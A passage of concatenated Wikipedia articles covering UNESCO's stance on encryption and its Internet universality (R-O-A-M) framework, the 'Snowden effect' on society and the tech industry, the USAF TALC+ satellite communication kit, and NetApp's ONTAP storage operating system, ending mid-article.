outlined that education and continuous modernization of cryptographic techniques are important. Human rights and cryptographic techniques Legality of limitations The impact of human rights can only be assessed by analyzing the possible limitations that states can set for those freedoms. UNESCO states that national security can be a legitimate aim for actions that limit freedom of speech and the right to privacy, but it calls for actions that are necessary and proportional. "UNESCO considers an interference with the right to encryption as a guarantee enshrined in the freedom of expression and in privacy as being especially severe if: • It affects the ability of key service providers in the media and communications landscape to protect their users' information and communication through secure cryptographic methods and protocols, thereby constituting the requirement of uninhibited communications for users of networked communication services and technologies. • The state reduces the possibility of vulnerable communities and/or structurally important actors like journalists to get access to encryption; • Mere theoretical risks and dangers drive restrictions to the relevant fundamental rights under the legal system of a state;• The mode of state action, e.g. if restrictions on fundamental rights are established through informal and voluntary arrangements, lead to unaccountable circumvention or erosion of the security of deployed cryptographic methods and technologies." Sources See also Free speech References Cryptography Human rights Freedom of speech Privacy Internet governance Encryption debate
55639999
https://en.wikipedia.org/wiki/Internet%20universality
Internet universality
Internet universality is a concept and framework adopted by UNESCO in 2015 to summarize their positions on the Internet. The concept recognizes that "the Internet is much more than infrastructure and applications, it is a network of economic and social interactions and relationships, which has the potential to enable human rights, empower individuals and communities, and facilitate sustainable development. The concept is based on four principles stressing the Internet should be Human rights-based, Open, Accessible, and based on Multistakeholder participation. These have been abbreviated as the R-O-A-M principles. Understanding the Internet in this way helps to draw together different facets of Internet development, concerned with technology and public policy, rights and development." Through the concept of internet universality, UNESCO highlights four separate but interdependent fields of Internet policy and practice that are considered "key" to assess a better Internet environment; access to information and knowledge, freedom of expression, privacy, and ethical norms and behavior online. A framework named ROAM was developed by UNESCO in order to investigate and evaluate the universality of Internet in different countries. The framework is based on four normative principles agreed by UNESCO Member States; human rights, openness, accessibility and multistakeholder participation, summarised in the acronym R-O-A-M. The principles represent a solid ground for UNESCO in order to create a tool to comprehend Internet governance: the Internet Universality indicators. History The term was agreed on by UNESCO's General Conference in 2015 as a means to integrate UNESCO's work, in the framework of the World Summit on the Information Society (WSIS). It is part of UNESCO's project to fulfill the 2030 Agenda for Sustainable Development. During the 37th session of the General Conference, UNESCO Member States affirmed the principle of applicability of human rights in cyberspace. The concept of Internet universality was then built upon the ‘CONNECTing the dots’ conference outcome document on 3–4 March 2015. UNESCO's Deputy Director General, Mr. Getachew Engida, in closing the ‘CONNECTing the dots’ conference, stated: "The Internet and all new information and communication must be at the heart of the post-2015 sustainable development agenda - as a transformational force and a foundation for building the knowledge societies we need." Wider context The social, civic and economic potential of a global Internet — one that bridges the world — is widely recognized. Connecting an individual, locality, nation or continent to the wealth of information, expertise and communities distributed across the globe is among the greatest promises of the Internet; for example, educational materials can now readily be put in the hands of students worldwide. However, the Internet can also empower users to create, disseminate, and consume information and knowledge resources. This potential for using the Internet to reconfigure access to information and knowledge, and also reshape freedom of expression, privacy, and ethical norms and behavior, has been a theme in academic research. Include the interconnected information and communication technologies, such as the Web, social media, developing mobile Internet, and the Internet of Things (IoT), including such developments as cloud computing, big data, and robotics, for example, that are increasingly central to networked technologies. Biometrics and other technologies central to developing network applications, such as for personal identification and security, are also incorporated in this definition. By 2014, over three billion people had gained access to the Internet from around the world. This is a major advance in worldwide access to information and knowledge, but translates to only 42 per cent of the world, leaving most of the world without access. Even those with access are often constrained by technical barriers, language barriers, skills deficits and many other social and policy factors, from accessing information and knowledge in essential ways. The global diffusion of the Internet is progressing, but at the same time what we know as the Internet is continually changing. Innovation continues apace in many areas, from mobile applications and payment systems to social media and Information and Communication Technologies (ICT). The Internet has reached more people in more powerful ways than ever thought possible. It has also become a major resource for economic development. Internet Universality Principles: R-O-A-M The R-O-A-M principles are a theoretical framework for assessing the state of play of each key fields of Internet policy. The framework underscores a set of principles that, when applied to the Internet, aim to achieve an open, global and secure Internet, by highlighting the relevance of human rights as a whole, as well as openness, accessibility and multistakeholder participation. Rights-based The Internet is becoming so significant in everyday life, work and identity in much of the world, that it is increasingly difficult to distinguish human rights on and off the Internet. UNESCO and the United Nations more broadly have affirmed the principle of human rights should apply to all aspects of the Internet. This would include, for example, freedom of expression, and privacy. UNESCO considers that as these two rights should also apply to the Internet, so should other rights, such as cultural diversity, gender equality, and education. As human rights are indivisible, for UNESCO all these rights mentioned above also need to be balanced with rights that apply to both digital and extra-digital life. Openness This general principle, applied to the Internet, encompasses open global standards, interoperability, open application interfaces, and open science, documents, text, data, and flows. Social and political support for open systems, not only technical expertise, is part of this principle. Transparency is part of openness, as well as a dimension of the rights to seek and receive information. Making rights and openness are interdependent. Accessibility There is special relevance to the Internet of the broader principle of social inclusion. This puts forward the role of accessibility in overcoming digital divides, digital inequalities, and exclusions based on skills, literacy, language, gender or disability. It also points to the need for sustainable business models for Internet activity, and to trust in the preservation, quality, integrity, security, and authenticity of information and knowledge. Accessibility is interlinked to rights and openness. Multistakeholders participation The general principle of participation in decision-making that impacts on the lives of individuals has been part of the Internet from its outset, accounting for much of its success. It recognizes the value of multistakeholder participation, incorporating users and a user-centric perspective as well as all other actors critical to developing, using and governing the Internet across a range of levels. The other principles are enriched by the multistakeholder participation principle, because it states that everyone should have a stake in the future of the Internet. It is possible to define a number of broad categories of stakeholders in the Internet, with subgroups as well: State, businesses and industries, non-governmental actors, civil society, international governmental organization, research actors, individuals, and others. Each of these categories has more or less unique stakes in the future of the Internet, but there are also areas of great overlap and interdependence. For instance, some NGOs, are likely to prioritize the promotion of human rights; meanwhile parliaments are primary actors in defining laws to protect these rights. Still other stakeholders are key to shaping rights online, such as search engine providers, and Internet Service Providers (ISPs). Individuals also have particular roles to play in respecting, promoting and protecting rights. Cross-cutting factors Aside from the four main factors (R-O-A-M), UNESCO has also identified five different cross-cutting factors that will suit all of the R-O-A-M factors, and should be taken into consideration. Of the five, two of them are concerned with gender and age equality, one is concerned with sustainable development (i.e. what part does the internet play in achieving the Sustainable Development Goals developed by the UN), the fourth is concerned with internet trust and security, and the last is concerned with legal and ethical properties of the internet. Internet Universality Indicators UNESCO is now developing Internet Universality indicators - based on the ROAM principles - to help governments and other stakeholders to assess their own national Internet environments and to promote the values associated with Internet Universality. The research process was envisioned to include consultations at a range of global forums and a written questionnaire sent to key actors, but also a series of publications on important Internet Freedom related issues as encryption, hate speech online, privacy, digital safety and journalism sources. The outcome of this multidimensional research will be publicized in June 2018. The final indicators will be submitted to the UNESCO Member States in the International Program for Development of Communication (IPDC) for endorsement. The indicators are divided into three different groups: quantitative indicators, qualitative indicators and institutional indicators (which concerns constitutional and legal arrangements). This has raised questions about the credibility of the indicators, as well as the difficulty of actually carrying out the research. Due to differences in data availability, it could be difficult to give a fair assessment to all indicators for all countries involved. However, in their draft UNESCO believes that the range and diversity of indicators included in the framework should enable the indicators to provide sufficient evidence of the Internet environment as a whole. Other challenges that it faces include different definitions of terms like 'broadband', as well as the fact that most of the data is held by private companies and is not publicly available as a result. The Four Major Fields of Focus Access to Information and Knowledge Access to information and knowledge encompasses the vision of universal access, not only to the Internet, but also to the ability to seek and receive open scientific, indigenous, and traditional knowledge online, and also produce content in all forms. This requires initiatives for freedom of information and the building of open and preserved knowledge resources, as well as a respect for cultural and linguistic diversity that fosters local content in multiple languages, quality educational opportunities for all, including new media literacy and skills, and social inclusion online, including addressing inequalities based on income, skills, education, gender, age, race, ethnicity, or accessibility by those with disabilities. Freedom of Expression Freedom of expression entails the ability to safely express one's views over the Internet, ranging from the rights of Internet users to freedom of expression online, through to press freedom and the safety of journalists, bloggers and human rights advocates, along with policies that enhance an open exchange of views and a respect for the rights of free online expression. Privacy refers broadly to Internet practices and policies that respect the rights of individuals to have a reasonable expectation of having a personal space, and to control access to their personal information. Privacy, therefore, allows individuals to freely express their ideas without fear of reprisals. Privacy Privacy protection is however a tricky concept that goes together with the promotion of openness and transparency and a recognition that privacy and its protection underpins freedom of expression and trust in the Internet, and therefore its greater use for social and economic development. Ethics Ethics considers whether the norms, rules and procedures that govern online behavior and the design of the Internet and related digital media are based on ethical principles anchored in human rights based principles and geared to protecting the dignity and safety of individuals in cyberspace and advance accessibility, openness, and inclusiveness on the Internet. For example, Internet use should be sensitive to ethical considerations, such as non-discrimination on the basis of gender, age or disabilities; and shaped by ethics rather than used to retrospectively justify practices and policies, placing a focus on the intentionality of actions, as well as on the outcomes of Internet policies and practices. Challenges to Internet Universality As the World Wide Web and related digital media have evolved, they have come to serve many diverse purposes for many different actors, e.g. household entertainment, government surveillance. Technical innovations are altering traditional business models, such as in the provision of news, and the structure of organizations, where traditional hierarchical reporting relationships have been challenged by many-to-one and many-to-many networks of communication that span organizational boundaries. Policy As digital media have been a force behind the convergence of formerly more distinct technologies of the post, telephone, and mass media, so policy and regulation have often failed to keep up, as we can see with the lack of a clear and unified regulation policy used by social media. This has left potentially inappropriate regulations in place and failed to integrate new solutions such as Media and information literacy. A worldwide ecology of policies and regulations is shaping the interrelated local and global outcomes of the Internet on access to information and knowledge, freedom of expression, privacy and ethics. And such policy choices are being considered by a multiplicity of actors at all levels for all are concerned that the policies and practices governing the Internet could undermine principles and purposes they view as fundamental, whether those values are centered on freedom of expression, the privacy of personal information, or ethical conduct, and whether the implications are perceived to be immediate or long term. Blocking, Filtering and Content Regulation Blocking and filtering of content regulation are common areas of concern for NGO's and International Organizations, such as UNESCO. These measures restrict in a direct way citizens’ rights to impart information and opinion, as well as impacting adversely on their rights to access online content. In many cases, users might not realize that content has been filtered or blocked. There was some recognition that alongside censorship as a violation of free expression, there is also legitimate reason in some contexts to block certain content, such as material that incites violence. This raises the question of how to draw the line in specific cases about what to block, for how long, in what proportion, and with what transparency and redress mechanism. Another issue is the danger of holding intermediaries liable as if they were publishers — for example, making social media platforms responsible for an alleged case of hate speech. International standards of human rights law mean that removal, blockage or filtering of Internet content should be the exception to the norm of free flow of information, and that such actions fulfill the conditions of due purpose, necessity, proportionality, and transparency, and are authorized under relevant law and policy. Furthermore, multiple actors, including individual users can identify instances of censorship and expose these cases to the court of public opinion. In such ways, the Internet has the potential for enabling individual Internet users to hold institutions and other users more accountable for their actions online, creating what has been called a ‘Fifth Estate’, analogous to the Fourth Estate of the press, but potentially even more powerful. A Fifth Estate does require a relatively free and open Internet to be sustainable and influential. User Targeting and Profiling Governments or commercial enterprises have the ability to target individual users, putting their privacy in danger, given that they will know much about their interests through their search or other online activities. Individual users of social media platforms can advertise to others who are interested in particular topics. This can appear more as a violation of privacy then the exercise of free speech. A related issue is the ‘filter bubble’: the idea that different Internet users will see different versions of the Internet, based on how algorithms use their previous search or social media preferences. User targeting can happen at the level of the government, private companies, or even at the infrastructural level. Expression and Identification The dependence of freedom of expression on related issues of privacy, anonymity, and encryption that face an apparent resistance to change. Anonymity Anonymity can be a cornerstone of privacy; it is considered as a prerequisite for the expression of unpopular or critical speech. Anonymity is sometimes viewed as contributing to harmful speech, such as hate speech, which goes beyond international standards of human rights law for protected speech. Despite this perception, academic research has not established that removing anonymity and requiring the identification of speakers would be a cure to insensitive or hurtful remarks. These incivilities are often fostered by a larger set of circumstances, such as a failure of users sitting at a computer to fully realize that they are communicating with a real person. Anonymity may also impact on public debate online. In some countries, participants would refrain from participating (for instance on the issue of gay rights or domestic abuse) for fear of identification and persecution. Anonymity in cyber-attacks, including fake domain attacks impersonating civil society, is a serious violation of free expression. Data protection and surveillance Data protection can be critical to free expression. Increasing government surveillance of citizens, including through the collection and analysis of ‘big data’, is leading to an erosion of the citizens' rights to privacy and freedom of expression. A report of the former UN Special Rapporteur on Freedom of Opinion and Expression states that, bulk access to all digital communications traffic eradicates the possibility of individualized proportionality analysis, because it pre-empts prior authorization based on specific targeted suspicion. The role of mass surveillance potentials and the use of big data analytics could change the balance between the state and individuals. Whistleblower, such as Edward Snowden, helped identifying the mass surveillance of communications metadata, as a disproportionate response in relation to the security problem. Concern were also expressed during the ‘CONNECTing the dots’ conference about surveillance tools, originally built to address severe crimes, being used to collect personal information about dissidents, or sometimes from all citizens. Further concerns were over weak transparency on how data is collected or used for security investigations. Manipulation of security practices such as the introduction of ‘back doors’ into software, to allow legitimate government access can leave Internet users vulnerable to other, illegitimate threats. Attackers can potentially get in through the same back doors, rendering systems less secure. Jurisdictional Issues There are a certain number of obstacles in maintaining and promoting the rights to freedom of expression via regulation and regulatory frameworks. Due to its globalized and borderless nature, the Internet can be seen as inherently unregulated. There is, for example, a difficulty in establishing effective state-based regulation in a world where content can be hosted and accessed from entirely different countries, leading to regulation becoming obsolete. Striking the correct regulatory balance is difficult, as over- or inappropriate regulation can have negative consequences not only for freedom of expression but for the value of the Internet in general. UNESCO considers that governments role is not to restrict freedoms, but rather to ensure that fundamental human rights — including communication-related rights — are protected. Paradoxically, a lack of regulation could be a detriment to the public interest. Internet-specific laws to protect freedom of expression could then be justified, since the Internet is so very different from any of the traditional media. Sources Notes References Freedom of speech Privacy Internet governance
55660110
https://en.wikipedia.org/wiki/Snowden%20effect
Snowden effect
The Snowden effect is part of the reactions to global surveillance disclosures made by Edward Snowden. His disclosures have fueled debates over mass surveillance, government secrecy, and the balance between national security and information privacy, and have resulted in notable impacts on society and the tech industry, and served as the impetus for new products that address privacy concerns such as encryption services. Collectively, these impacts been referred to by media and others as the "Snowden effect". On society In July 2013, media critic Jay Rosen defined the Snowden effect as "Direct and indirect gains in public knowledge from the cascade of events and further reporting that followed Edward Snowden's leaks of classified information about the surveillance state in the U.S." In December 2013, The Nation wrote that Snowden had sparked an overdue debate about national security and individual privacy. At the 2014 World Economic Forum, Internet experts saw news that Microsoft would let foreign customers store their personal data on servers outside America as a sign that Snowden's leaks were leading countries and companies to erect borders in cyberspace. In Forbes, the effect was seen to have nearly united the U.S. Congress in opposition to the massive post-9/11 domestic intelligence gathering system. In its Spring 2014 Global Attitudes Survey, the Pew Research Center found that Snowden's disclosures had tarnished the image of the United States, especially in Europe and Latin America. In May 2014, the Obama administration appointed William Evanina, a former FBI special agent with a counter-terrorism specialty, as the new government-wide National Counterintelligence Executive. "Instead of getting carried away with the concept of leakers as heroes," Evanina said in August, "we need to get back to the basics of what it means to be loyal. Undifferentiated, unauthorized leaking is a criminal act." While dealing with insider threats had been an intelligence community priority since WikiLeaks published Chelsea Manning's disclosures in 2010, Evanina said that in the aftermath of Snowden's June 2013 revelations, the process "sped up from a regional railway to the Acela train." A year later, 100,000 fewer people had security clearances. In September 2014, Director of National Intelligence James Clapper said Snowden's leaks created a perfect storm, degrading the intelligence community's capabilities. Snowden's leaks, said Clapper, damaged relationships with foreign and corporate stakeholders, restrained budget resources, and caused the U.S. to discontinue collecting intelligence on certain targets, putting the United States at greater risk. In October 2014, former Director of the National Counterterrorism Center Matthew G. Olsen told CNN that Snowden's disclosures had made it easier for terrorist groups to evade U.S. surveillance by changing their encryption methods. Olsen said intelligence collection against some individuals of concern had been lost, preventing insight into their activities. By July 2015 ISIL had studied Snowden's disclosures and, said U.S. officials, its leaders were using couriers or encrypted communications that Western analysts could not crack. In February 2015, National Counterterrorism Center director Nicholas Rasmussen told Congress that Snowden's disclosures had damaged U.S. intelligence capabilities. Rasmussen said the government knew of specific terrorists who, after learning from Snowden's leaks how the U.S. collected intelligence, had increased their security measures by using new types of encryption, changing email addresses, or abandoning prior methods of communicating. Reflecting on the effect of his leaks, Snowden himself wrote in February 2015 that "the biggest change has been in awareness. Before 2013, if you said the NSA was making records of everybody's phone calls and the GCHQ was monitoring lawyers and journalists, people raised eyebrows and called you a conspiracy theorist. Those days are over." In March 2015, USA Today reported that the Snowden effect had hit The Guardian. Journalist Michael Wolff, who wrote for The Guardian for many years, asserted that the recent selection of Katharine Viner as editor-in-chief "can be read as, in part, a deeply equivocal response on the part of the paper's staff, with its unusual power in the process of selecting a new editor, to the Snowden story." According to Wolff, there had developed "a sense of journalistic queasiness around Snowden, difficult to express at the party-line Guardian. Questioning Snowden's retreat to Russia and his protection by Vladimir Putin was internally verboten." Technology industry In the technology industry, the Snowden effect had a profound impact after it was revealed that the NSA was tapping into the information held by some U.S. cloud-based services. Google, Cisco, and AT&T lost business internationally due to the public outcry over their roles in NSA spying. A study by the Information Technology and Innovation Foundation published in August 2013 estimated that the cloud-based computing industry could have lost up to $35 billion by 2016. The Wall Street Journal named "the Snowden effect" as 2013's top tech story, saying Snowden's leaks "taught businesses that the convenience of the cloud cuts both ways." The Journal predicted the effect would top 2014 news as well, given the number of documents yet to be revealed. In China, the most profitable country for U.S. tech companies, all are "under suspicion as either witting or unwitting collaborators" in the NSA spying, according to the director of the Research Center for Chinese Politics and Business at Indiana University. The effect was also seen in changes to investment in the industry, with security "back on the map" according to Hussein Kanji, Venture Capitalist at Hoxton Ventures. On August 8, 2013, Lavabit, a secure email provider that Snowden used, discontinued service after being asked for encryption keys that would have exposed to U.S. government prosecutors the emails of all 410,000 Lavabit users. The next day, a similar provider called Silent Circle announced that it too would shut down because it was not possible to sufficiently secure email. In October 2013, the two companies joined forces and announced a new email service, Dark Mail Alliance, designed to withstand government surveillance. After revelations that German Chancellor Angela Merkel's mobile was being tapped, the tech industry rushed to create a secure cell phone. According to TechRepublic, revelations from the NSA leaks "rocked the IT world" and had a "chilling effect". The three biggest impacts were seen as increased interest in encryption, business leaving U.S. companies, and a reconsideration of the safety of cloud technology. The Blackphone, which The New Yorker called "a phone for the age of Snowden"—described as "a smartphone explicitly designed for security and privacy", created by the makers of GeeksPhone, Silent Circle, and PGP, provided encryption for phone calls, emails, texts, and Internet browsing. Since Snowden's disclosures, Americans used the Internet less for things like email, online shopping and banking, according to an April 2014 poll. Also in April 2014, former NSA deputy director Col. Cedric Leighton told the Bloomberg Enterprise Technology Summit in New York City that Snowden's leaks had performed a significant disservice to the worldwide health of the Internet by leading Brazil and other countries to reconsider the Internet's decentralized nature. Leighton suggested that nation-states' efforts to create their own versions of the Internet were the beginning of the end for the Internet as we know it. "When you have a situation where all of a sudden, everyone goes into 'tribal' mode—a German cloud, a Swiss cloud, or any other separate Internet—they are significant nationalistic attempts," said Leighton. "What happened with Snowden, it's more of an excuse than a policy, it's more of an excuse to re-nationalize the Internet." In March 2014, The New York Times reported that economic fallout from Snowden's leaks had been a boon for foreign companies, to the detriment of U.S. firms. Daniel Castro, a senior analyst at the Information Technology and Innovation Foundation, predicted that the United States cloud computing industry could lose $35 billion by 2016. Matthias Kunisch, a German software executive who switched from U.S. cloud computing providers to Deutsche Telekom, said that due to Snowden his customers thought American companies had connections to the NSA. Security analysts estimated that U.S. tech companies had since Snowden collectively spent millions and possibly billions of dollars adding state-of-the-art encryption features to consumer services and to the cables that link data centres. In July 2014, the nonpartisan New America Foundation summarized the impact of Snowden's revelations on U.S. businesses. The erosion of trust, said the report, has had serious consequences for U.S. tech firms. IT executives in France, Hong Kong, Germany, the UK, and the U.S. confirmed that Snowden's leaks directly impacted how companies around the world think about information and communication technologies, particularly cloud computing. A quarter of British and Canadian multinational companies surveyed were moving their data outside the U.S. Among U.S. companies attributing drops in revenue to, in part, the fallout from Snowden's leaks was Cisco Systems, Qualcomm, IBM, Microsoft, and Hewlett-Packard. Proposed laws in more than a dozen foreign countries, including Germany, Brazil, and India, would make it harder for U.S. firms to do business there. The European Union is considering stricter domestic privacy legislation that could result in fines and penalties costing U.S. firms billions of dollars. In August 2014, Massachusetts-based web intelligence firm Recorded Future announced it had found a direct connection between Snowden's leaks and dramatic changes in how Islamist terrorists interacted online. (In 2010, the privately held Recorded Future received an investment from In-Q-Tel, a nonprofit venture capital firm whose primary partner is the CIA.) Just months after Snowden's 2013 leaks, said Recorded Future, operatives of al-Qaeda and associated groups completely overhauled their 7-year-old encryption methods, which included "homebrewed" algorithms, adopting instead more sophisticated open-source software and newly available downloads that enabled encryption on cellphones, Android products, and Macs, to help disguise their communications. In September 2014, Seattle-based Deep Web and Dark web monitoring firm Flashpoint Global Partners published a report that found "very little open-source information available via jihadi online social media" indicating that Snowden's leaks impelled al-Qaeda to develop more secure digital communications. "The underlying public encryption methods employed by online jihadists," the report concluded, "do not appear to have significantly changed since the emergence of Edward Snowden. Major recent technological advancements have focused primarily on expanding the use of encryption to instant messenger and mobile communications mediums." In May 2015, The Nation reported, "The fallout from the Edward Snowden fiasco wasn't just political—it was largely economic. Soon after the extent of the NSA's data collection became public, overseas customers (including the Brazilian government) started abandoning U.S.-based tech companies in droves over privacy concerns. The dust hasn't settled yet, but tech-research firm Forrester estimated the losses may total 'as high as $180 billion,' or 25 percent of industry revenue." Consumer products In September 2014, The New York Times credited Apple Inc.'s update of iOS 8, which encrypts all data inside it, as demonstrating how Snowden's impact had begun to work its way into consumer products. His revelations said The Times, "not only killed recent efforts to expand the law, but also made nations around the world suspicious that every piece of American hardware and software—from phones to servers made by Cisco Systems—have 'back doors' for American intelligence and law enforcement." The Times situated this development within a "Post Snowden Era" in which Apple would no longer comply with NSA and law enforcement requests for user data, instead maintaining that Apple doesn't possess the key to unlocking data on the iPhone. However, since the new security protects information stored on the device itself, but not data stored on Apple's iCloud service, Apple will still be able to obtain some customer information stored on iCloud in response to government requests. The Times added that Google's Android would have encryption enabled by default in upcoming versions. References Global surveillance Effect
55726395
https://en.wikipedia.org/wiki/TALC%2B
TALC+
The Tanker Airborne Long-range Communication Plus (TALC+) Kit is a USAF satellite communication system for low-data-rate, classified communications. TALC+ includes an Iridium radio-modem, an antenna installed in the sextant port, a strong encryption device, a classified laptop computer, a handset, and a headset within a carry-on sized case. TALC+ provides KC-135 aircraft affordable, secure, global, and simple communication. TALC+ can call almost any telephone worldwide for non-secure voice communication, talk up to Secret with STEs (or other SCIP-based telephones), or join chatrooms on SIPRNet. TALC+ may be customized, renamed, and certified for other platforms such as KC-10s, C-130s, and other Iridium-compatible aircraft, trucks or buildings. TALC+ was created by the Air Force Research Laboratory's Center for Rapid Innovation and NAL Research Corporation in response to requests from AMC and AFGSC leadership needs. TALC+ has been purchased by the Air Mobility Command and on the MC-130J To watch a four-chapter video explaining how to use and install TALC+, just CAC-into milTube and search for TALC+. References Communications satellites
55747091
https://en.wikipedia.org/wiki/ONTAP
ONTAP
ONTAP or Data ONTAP or Clustered Data ONTAP (cDOT) or Data ONTAP 7-Mode is NetApp's proprietary operating system used in storage disk arrays such as NetApp FAS and AFF, ONTAP Select and Cloud Volumes ONTAP. With the release of version 9.0, NetApp decided to simplify the Data ONTAP name and removed word "Data" from it and remove 7-Mode image, therefore, ONTAP 9 is successor from Clustered Data ONTAP 8. ONTAP includes code from Berkeley Net/2 BSD Unix, Spinnaker Networks technology and other operating systems. ONTAP originally only supported NFS, but later added support for SMB, iSCSI and Fibre Channel Protocol (including Fibre Channel over Ethernet and FC-NVMe). On June 16, 2006, NetApp released two variants of Data ONTAP, namely Data ONTAP 7G and, with nearly a complete rewrite, Data ONTAP GX. Data ONTAP GX was based on grid technology acquired from Spinnaker Networks. In 2010 these software product lines merged into one OS - Data ONTAP 8, which folded Data ONTAP 7G onto the Data ONTAP GX cluster platform. Data ONTAP 8 includes two distinct operating modes held on a single firmware image. The modes are called ONTAP 7-Mode and ONTAP Cluster-Mode. The last supported version of ONTAP 7-Mode issued by NetApp was version 8.2.5. All subsequent versions of ONTAP (version 8.3 and onwards) have only one operating mode - ONTAP Cluster-Mode. The majority of large-storage arrays from other vendors tend to use commodity hardware with an operating system such as Microsoft Windows Server, VxWorks or tuned Linux. NetApp storage arrays use highly customized hardware and the proprietary ONTAP operating system, both originally designed by NetApp founders David Hitz and James Lau specifically for storage-serving purposes. ONTAP is NetApp's internal operating system, specially optimized for storage functions at high and low level. The original version of ONTAP had a proprietary non-UNIX kernel and a TCP/IP stack, networking commands, and low-level startup code from BSD. The version descended from Data ONTAP GX boots from FreeBSD as a stand-alone kernel-space module and uses some functions of FreeBSD (for example, it uses a command interpreter and drivers stack). ONTAP is also used for virtual storage appliances (VSA), such as ONTAP Select and Cloud Volumes ONTAP, both of which are based on a previous product named Data ONTAP Edge. All storage array hardware include battery-backed non-volatile memory, which allows them to commit writes to stable storage quickly, without waiting on disks while virtual storage appliances using virtual nonvolatile memory. Implementers often organize two storage systems in a high-availability cluster with a private high-speed link, either a Fibre Channel, InfiniBand, 10 Gigabit Ethernet, 40 Gigabit Ethernet or 100 Gigabit Ethernet. One can additionally group such clusters under a single namespace when running in the "cluster mode" of the Data ONTAP 8 operating system or on ONTAP 9. Data ONTAP was made available for commodity computing servers with x86 processors, running atop VMware vSphere hypervisor, under the name "ONTAP Edge". Later ONTAP Edge was renamed to ONTAP Select and KVM added as supported hypervisor. History Data ONTAP, including WAFL, was developed in 1992 by David Hitz, James Lau, and Michael Malcolm. Initially, it supported NFSv2; the CIFS protocol was introduced to Data ONTAP 4.0 in 1996. In April 2019, Octavian Tanase SVP ONTAP, posted a preview photo in his twitter of ONTAP running in Kubernetes as a container for a demonstration. WAFL File System The Write Anywhere File Layout (WAFL) is a file layout used by ONTAP OS that supports large, high-performance RAID arrays, quick restarts without lengthy consistency checks in the event of a crash or power failure, and growing the size of the filesystems quickly. Storage Efficiencies ONTAP OS contains a number of storage efficiencies, which are based on WAFL functionalities. Supported by all protocols, does not require licenses. In February 2018 NetApp claims AFF systems for its clients gain average 4.72:1 Storage Efficiency from deduplication, compression, compaction and clones savings. Starting with ONTAP 9.3 offline deduplication and compression scanners start automatically by default and based on percentage of new data written instead of scheduling. Data Reduction efficiency is summary of Volume and Aggregate Efficiencies and Zero-block deduplication: Volume Efficiencies could be enabled/disabled individually and on volume-by-volume basis: Offline Volume Deduplication, which works on 4KB block level Additional efficiency mechanism were introduced later, such as Offline Volume Compression also known as Post-process (or Background) Compression, there are two types: Post-process secondary compression and Post-process adaptive compression Inline Volume Deduplication and Inline Volume Compression are compress some of the data on the fly before it reaches the disks and designed to leave some of the data in uncompressed form if it considered by ONTAP to take a long time to process them on the fly, and to leverage other storage efficiency mechanisms for this uncompressed data later. There are two types of Inline Volume Compression: Inline adaptive compression and Inline secondary compression Aggregate Level Storage Efficiencies includes: Data Compaction is another mechanism used to compress many data blocks smaller than 4KB to a single 4KB block Inline Aggregate-wide data deduplication (IAD) and Post-process aggregate deduplication also known as Cross-Volume Deduplication shares common blocks between volumes on an aggregate. IAD can throttle itself when storage system crosses a certain threshold. The current limit of physical space of a single SSD aggregate is 800TiB Inline Zero-block Deduplication deduplicate zeroes on the fly before they reach disks Snapshots and FlexClones are also considered efficiency mechanisms. Starting with 9.4 ONTAP by default deduplicate data across active file system and all the snapshots on the volume, saving from snapshot sharing is a magnitude of number of snapshots, the more snapshots the more savings will be, therefore snapshot sharing gives more savings on SnapMirror destination systems. Thin Provisioning Cross-Volume Deduplication storage efficiency features work only for SSD media. Inline and Offline Deduplication mechanisms that leverage databases consist of links of data blocks and checksums, for those data blocks that been handled by the deduplication process. Each deduplication database is located on each volume and aggregates where deduplication is enabled. All Flash FAS systems does not support Post-process Compression. Order of Storage Efficiencies execution is as follows: Inline Zero-Block deduplication Inline Compression: for files that could be compressed to the 8KB adaptive compression used, for files more than 32KB secondary compression used Inline Deduplication: Volume first, then Aggregate Inline Adaptive Data Compaction Post-process Compression Post-process Deduplication: Volume first, then Aggregate Aggregates One or multiple RAID groups form an "aggregate", and within aggregates ONTAP operating system sets up "flexible volumes" (FlexVol) to actually store data that users can access. Similarly to RAID 0, each aggregate consolidates space from underlying protected RAID groups to provide one logical piece of storage for flexible volumes. Alongside with aggregates consists of NetApp's own disks and RAID groups aggregates could consist of LUNs already protected with third-party storage systems with FlexArray, ONTAP Select or Cloud Volumes ONTAP. Each aggregate could consist of either LUNs or with NetApp's own RAID groups. An alternative is "Traditional volumes" where one or more RAID groups form a single static volume. Flexible volumes offer the advantage that many of them can be created on a single aggregate and resized at any time. Smaller volumes can then share all of the spindles available to the underlying aggregate and with a combination of storage QoS allows to change the performance of flexible volumes on the fly while Traditional volumes don't. However, Traditional volumes can (theoretically) handle slightly higher I/O throughput than flexible volumes (with the same number of spindles), as they do not have to go through an additional virtualization layer to talk to the underlying disk. Aggregates and traditional volumes can only be expanded, never contracted. Current maximum aggregate physical useful space size is 800 TiB for All-Flash FAS Systems. 7-Mode and earlier The first form of redundancy added to ONTAP was the ability to organize pairs of NetApp storage systems into a high-availability cluster (HA-Pair); an HA-Pair could scale capacity by adding disk shelves. When the performance maximum was reached with an HA-Pair, there were two ways to proceed: one was to buy another storage system and divide the workload between them, another was to buy a new, more powerful storage system and migrate all workload to it. All the AFF and FAS storage systems were usually able to connect old disk shelves from previous models—this process is called head-swap. Head-swap requires downtime for re-cabling operations and provides access to old data with new controller without system re-configuration. From Data ONTAP 8, each firmware image contains two operating systems, named "Modes": 7-Mode and Cluster-Mode. Both modes could be used on the same FAS platform, one at a time. However, data from each of the modes wasn't compatible with the other, in case of a FAS conversion from one mode to another, or in case of re-cabling disk shelves from 7-Mode to Cluster-Mode and vice versa. Later, NetApp released the 7-Mode transition Tool (7MTT), which is able to convert data on old disk shelves from 7-Mode to Cluster-Mode. It is named Copy-Free Transition, a process which required downtime. With version 8.3, 7-Mode was removed from the Data ONTAP firmware image. Clustered ONTAP Clustered ONTAP is a new, more advanced OS, compared to its predecessor Data ONTAP (version 7 and version 8 in 7-Mode), which is able to scale out by adding new HA-pairs to a single namespace cluster with transparent data migration across the entire cluster. In version 8.0, a new aggregate type was introduced, with a size threshold larger than the 16-terabyte (TB) aggregate size threshold that was supported in previous releases of Data ONTAP, also named the 64-bit aggregate. In version 9.0, nearly all of the features from 7-mode were successfully implemented in ONTAP (Clustered) including SnapLock, while many new features that were not available in 7-Mode were introduced, including features such as FlexGroup, FabricPool, and new capabilities such as fast-provisioning workloads and Flash optimization. The uniqueness of NetApp's Clustered ONTAP is in the ability to add heterogeneous systems (where all systems in a single cluster do not have to be of the same model or generation) to a single cluster. This provides a single pane of glass for managing all the nodes in a cluster, and non-disruptive operations such as adding new models to a cluster, removing old nodes, online migration of volumes, and LUNs while data is contiguously available to its clients. In version 9.0, NetApp renamed Data ONTAP to 